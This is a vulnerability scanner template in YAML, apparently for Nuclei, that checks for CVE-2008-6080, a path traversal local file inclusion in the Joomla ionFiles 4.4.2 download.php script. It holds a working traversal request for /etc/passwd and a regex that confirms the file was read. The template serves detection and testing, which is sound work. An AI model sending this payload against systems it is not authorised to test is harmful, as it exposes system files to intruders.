38 lines
1.2 KiB
YAML
38 lines
1.2 KiB
YAML
id: CVE-2008-6080
|
|
|
|
info:
|
|
name: Joomla! ionFiles 4.4.2 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/6809
|
|
- https://www.cvedetails.com/cve/CVE-2008-6080
|
|
- http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/
|
|
- http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-6080
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.6
|
|
cve-id: CVE-2008-6080
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2008,joomla,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/06
|